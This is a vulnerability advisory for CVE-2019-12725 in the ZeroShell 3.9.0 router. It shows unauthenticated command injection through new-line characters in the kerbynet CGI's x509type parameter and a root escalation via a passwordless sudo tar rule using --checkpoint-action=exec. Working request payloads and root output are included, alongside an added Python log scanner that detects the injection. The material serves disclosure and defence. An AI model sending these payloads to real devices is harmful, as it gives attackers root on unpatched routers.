
ZeroShell Vulnerability – CVE-2019-12725

Product: ZeroShell
Publication Date: 17/07/2019
Author: Juan Manuel Fernandez (@TheXC3LL) – Tarlogic

Zeroshell vulnerability – CVE-2019-12725 RCE as root

The latest version of the ZeroShell Linux router (3.9.0) is vulnerable to RCE because some parameters inside a script are used without proper sanitization. The issue can be abused by injecting new-line characters:

Example of vulnerable parameter:

/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509view&User=Admin&x509type='%0Auname -a%0A'
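
Added example, not part of the original advisory: a Python check that scans web server access log lines for requests to the kerbynet CGI whose decoded query parameters contain control characters, such as the new-line used above. The Apache common/combined log format, the function names and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

CGI_PATH = "/cgi-bin/kerbynet"
# Request line of a common/combined-format access log entry; the lazy match
# tolerates raw spaces inside the logged target.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>.+?) HTTP/[\d.]+"')
# Any C0 control character or DEL in a decoded value (new-line is \x0a).
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")

# Constructed sample entries (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jul/2019:10:00:01 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ'
    '&Action=x509view&User=Admin&x509type=%27%0Auname%20-a%0A%27 HTTP/1.1" 200 512',
    '192.0.2.11 - - [17/Jul/2019:10:00:05 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ'
    '&Action=x509view&User=Admin&x509type=EXAMPLE HTTP/1.1" 200 2048',
    '192.0.2.11 - - [17/Jul/2019:10:00:09 +0000] "GET /index.html?q=a%0Ab HTTP/1.1" 200 100',
    '198.51.100.7 - - [17/Jul/2019:10:01:30 +0000] "POST /cgi-bin/kerbynet?Action=x509view'
    '&User=a%0d%0ab&x509type=EXAMPLE HTTP/1.1" 200 512',
]


def suspicious_params(target):
    """Names of kerbynet query parameters whose decoded value has control chars."""
    parts = urlsplit(target)
    if parts.path != CGI_PATH:
        return []
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    return [name for name, value in pairs if CONTROL_RE.search(value)]


def scan(lines):
    """Return (line number, client address, parameter names) for flagged entries."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match is None:
            continue  # not a parseable request line
        names = suspicious_params(match.group("target"))
        if names:
            findings.append((lineno, line.split()[0], names))
    return findings


if __name__ == "__main__":
    for lineno, client, names in scan(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent control characters in {names}")
```

The check covers only the query string, so parameters sent in a POST body need the same test applied wherever request bodies are captured.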

Additionally, the Apache user can execute the “tar” command as root without a password (/etc/sudoers):

(…)

apache ALL= NOPASSWD: /bin/tar

(…)

Zeroshell exploit

This ZeroShell vulnerability can be abused to elevate privileges to root via the RCE:

/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A/etc/sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=id%0A'

uid=0(root) gid=0(root) groups=0(root)

A security update will be released in the coming days.
